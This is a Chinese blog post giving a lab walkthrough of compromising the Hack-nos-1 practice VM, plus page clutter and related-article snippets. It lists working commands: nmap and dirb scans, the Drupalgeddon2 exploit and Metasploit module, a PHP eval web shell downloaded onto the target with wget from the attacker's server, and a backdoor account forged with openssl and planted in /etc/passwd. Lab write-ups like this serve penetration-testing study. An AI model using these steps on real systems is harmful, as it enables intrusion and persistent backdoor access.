Hack-nos-1的一次靶场实战练习

最新推荐文章于 2024-03-11 21:05:14 发布
最新推荐文章于 2024-03-11 21:05:14 发布
阅读量190 收藏
点赞数 5
文章标签: php 开发语言 github 开源
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58153689/article/details/126541201
版权

1.在kali中打开终端,输入ifconfig,查看本机IP地址。

2.用nmap 192.168.1.0/24 -sT,确定靶机地址。

3.用dirb http://192.168.1.38,扫描网站敏感文件信息,从而挖掘漏洞。

  

 

4.找到dir(directory)目录下的网页,在火狐打开,打开后发现为开源的CMS。

  

  

 

5.用Github进行漏洞搜索利用,搜索到信息后打开下载,然后拉至kali,进行漏洞利用。

 

6.在kali中打开工具包,在工具包中右击进入root权限终端,进行攻击程序执行:

   (1)gem install highline

   (2)./drupalgeddon2.rb

   (3)./drupalgeddon2.rb http://192.168.1.19/drupal/

 

7.由于当前只有命令执行的接口,所以必须执行Getshell操作,即进行权限维持:

   (1)利用一句话木马“<?php @eval($_POST[sec]);?>”,在windows桌面创建文本将木马放入。

   (2)将木马文件移至kali,在kali中打开HTTP服务。桌面打开终端,输入python3 -m http.server 8080开启HTTP服务并通过浏览器进行访问测试。

        

 

   (3)执行wget http://192.168.1.50:8080/123.php命令将一句话木马下载至靶机。

        

 

(4)通过网址登陆目标靶机测试是否成功“192.168.1.19/drupal/123.php”,显示空白即为成功。

             

 

(5)验证网站后门的地址在蚁剑链接并执行命令。【whoami】

 

8.蚁剑添加数据,在文档中下载passwd文档至windows桌面。

9.在本地添加后门账号保存 。

  

 

10.造出Linux操作系统中用户的密码加密值,在kali中输入openssl passwd -1 -salt salt sis2208,显示密码,复制至本地passwd保存。

  

 

11.将这个passwd下载回靶机中进行替换,将本机passwd文件拉至kali桌面中,然后在在蚁剑中执行wget http://192.168.1.50:8080/passwd -O passwd。

  

 

12.用cat passwd检查是否添加成功。

  

 

13.用msf进行攻击:(1)msfconsole

                  (2)use exploit/unix/webapp/drupal_drupalgeddon2

                  (3)set rhosts 192.168.1.19

                  (4)set targeturi /drupal

                  (5)run

14.(1)shell【进入目标的命令执行环境】

     (2)python3 -c 'import pty; pty.spawn("/bin/bash")'

     (3)su sis2208 【su 用来切换用户身份】

Ye skr
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试之漏洞挖掘指南(一)
xiaoli8748的专栏
09-17 133
- 前端漏洞 (xss, csrf , cors, jsonp...)新手想快速挖掘到漏洞,要专注在。-- 业务逻辑 (弱密码,)
voting-nos-dapp
05-17
自定义智能合约dApp 先决条件: 安装在系统中的python docker-compose已安装。 pip install -U docker-compose ...$ cd voting-nos-dapp $ python auto_create.py 检查是否所有容器都已启动并正在运
我的HackerOne漏洞赏金平台漏洞挖掘流程
Ba1_Ma0的博客
04-25 7356
高强度在国外的hackerone平台挖了一周的漏洞,在这里分享一下经验
子域名劫持(Subdomain Takeover)
Fly_鹏程万里
09-23 1737
 前言 在搜资料的时候偶然发现了这么一种子域名劫持(Subdomain Takeover)漏洞,平时没遇到过,感觉很有趣,可以利用劫持玩出很多花样,同样,HackOne上也有很多例子: https://hackerone.com/reports/172137 https://hackerone.com/reports/32825 https://hackerone.com/reports/...
文件上传漏洞------一句话木马原理解析
最新发布
m0_69151365的博客
03-11 1000
这是一个最简单的一句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上一个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是一句话木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
国外src(漏洞挖掘平台)
weixin_42109829的博客
09-19 8313
https://zhuanlan.zhihu.com/p/468705739
SRC挖掘密码重置漏洞总结
hackzkaq的博客
08-15 956
最近一直在看国外众测的文章,偶尔也逛逛hackerone,发现公布的漏洞中存有不少的逻辑漏洞,毕竟在hackerone上提交漏洞过审之后给的是美元,还是很有诱惑力的。密码找回功能也是老调常谈的一个功能,前段时间也写过一篇文章是关于密码找回的,发现总结的不是很全面。借这个机会通过展示国外众测例子希望能对这个漏洞有个较为全面的总结其实吧思路是层出不穷,这只能算是最基本的思路吧。只是希望大家在测试的时候不至于盲目,没有头绪,在基本的操作之上发现骚操作,这应该才是我们的追求。...
create-nos-dapp:CLI工具生成新的nOS dApp
04-25
create-nos-dapp 这是一个CLI工具,可以使用您喜欢的前端技术为nOS平台生成dApp项目。 目的 该项目的目标是提供一个快速入门,以创建具有已安装并配置为可与nOS平台一起使用的各种前端技术的nOS dApp。 安装 在开始...
fis-nos:在 91 号
06-26
fis-nos基于.NET的前端集成解决方案
4412exy-nos.rar
02-05
4412exy-nos.rar
ms-nos-core-client:一个测试核心功能的简单客户端
05-19
-ms-nos-core-client 一个测试核心功能的简单客户端
[经验分享]SRC漏洞挖掘之道
MachineGunJoe666
09-12 465
挖 SRC 需要有一个好心态,国内 SRC 生态并不是很好,SRC 感觉更多的提供了一个相对安全的测试保障,所以更需要抱着一种学习的心态去挖,将我们学习的到的知识灵活运用,发现新的问题。不要想我今晚一定要挖到多少漏洞,要拿到多少奖金,不然可能会被忽略三连打崩心态。
漏洞挖掘|密码找回中的套路
hackzkaq的博客
02-16 321
零基础学黑客,搜索公众号:白帽子左一 作者:先知社区- 爱吃猫的闲鱼 原文地址:https://xz.aliyun.com/t/7977 前言 首先这不是一篇总结性的帖子,毕竟对于密码找回的测试方法网络上有比较全面的总结 比如用户凭证暴力破解,系统返回了重要的凭证,邮箱手机弱token,token通用,session覆盖,用户凭证有效期问题,凭证算法被破解,前端校验等等一系列漏洞。 在这里附上前辈总结的脑图,总结的也是比较详细了。 在日常的授权测试以及论坛瞎逛中,发现了一些对于个人而言比较有意思的找
SRC混子的漏洞挖掘之道
Karka_的博客
03-19 453
挖SRC需要有一个好心态,国内SRC生态并不是很好,SRC感觉更多的提供了一个相对安全的测试保障,所以更需要抱着一种学习的心态去挖,将我们学习的到的知识灵活运用,发现新的问题。不要想我今晚一定要挖到多少漏洞,要拿到多少奖金,不然可能会被忽略三连打崩心态。
靶场 - Kali系列【5题】
feiniaotjx的博客
10-28 2282
靶场 - Kali系列【5题】信息搜集之: 子域名探测信息搜集:端口扫描漏洞扫描 - web扫描器注入测试-sqlmapSqlmap --os-shell 信息搜集之: 子域名探测 flag在http://shop.aqlab.cn里 import requests with open('D:/zuomian/ctf shiyan/dict.txt') as f: for i in f: ii=i.replace('\n','') url = 'http://'+
CTFhub 文件上传漏洞 靶场实战通关攻略
hackzkaq的博客
11-02 605
1、使用010editor新建文件,输入一句话木马,在其前面输入10次空格,再切换为十六进制的形式,在文件的最前面加入PNG文件的文件头。1、使用010editor新建文件,输入一句话木马,在其前面输入10次空格,再切换为十六进制的形式,在文件的最前面加入JPG文件的文件头。1、准备好一张PNG图片和一个脚本文件test.php,文件内容为一句话木马,在cmd命令行中输入命令进行文件拼接,1、准备好一张PNG图片和一个脚本文件test.php,文件内容为一句话木马,在cmd命令行中输入命令进行文件拼接,
hackerone挖反射xss,最重要的就是要会接化发
weixin_50464560的博客
03-13 692
挖反射xss,最重要的就是要会接化发,不会接化发,你就不能说自己会挖反射xss。接,就是要看html请求包:回包看, 这就化出来了。然后就是发,发就是把荷载发出去。先轻轻地注入” 符号,很好啊,没转义,没过滤。我反手就是松果弹抖闪电鞭。一鞭,style=xxxxxx"-alert(1)-"它挡住了,有waf。5鞭我就过去了啊。然后我就提交啊,这就250刀到手了啊“”然后换一个地方,挪一下窝啊,因为一个路径只接受一个xss,还是接化发。接, liso_rtar;化, liso, rtar;很好啊,两个参数都行
Hackerone漏洞分析:星巴克隐私数据泄露
weixin_46236101的博客
10-06 620
某个沉闷的夏日午后,Sam Curry在Verizon Media公司的漏洞众测项目中尝试了快一天,啥也没发现,于是,他决定先放放,做点其它事。哦,对了,朋友生日就要到了,去星巴克官网买个礼物送给她吧。 访问星巴克官网的时候,Sam无意间发现了大量API交互,他忍不住动手测试了一把,这一测就发现了漏洞线索。在星巴克官网名为/bff/proxy/的API接口下,Sam先发现了路径/bff/proxy/orchestra/get-user可以返回自己的注册信息,之后Sam对/bff/proxy/orchestr
纯干货!一个白帽子挖漏洞经验细致分享
热门推荐
大方子
10-05 2万+
不知道是不是很多人和我一样,每天刷着漏洞,看着自己的排名一位一位的往上提升,但是,但是。总感觉怪怪的,为什么别人刷的漏洞都是现金,而自己刷的漏洞都是给库币。别人一天为什么提交那么多漏洞,都是高危。而自己挖了一天也不见得会超过五个十个之类的,还被评为低危。为什么?你问我为什么,难道你心里还没有一点数么?   讲讲自己的套路!看的上的可以借鉴,看不上的,请自便吧! 请注意,以下所涉及的工具,请百...
nos文献质量评价量表
09-12
NOS(Newcastle-Ottawa Scale)文献质量评价量表是一种常用的评价研究质量的工具。该量表根据研究设计的不同,将研究分为观察性研究和队列研究两类。观察性研究在评估中有8个项目,包括选择研究对象的合适性、研究中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值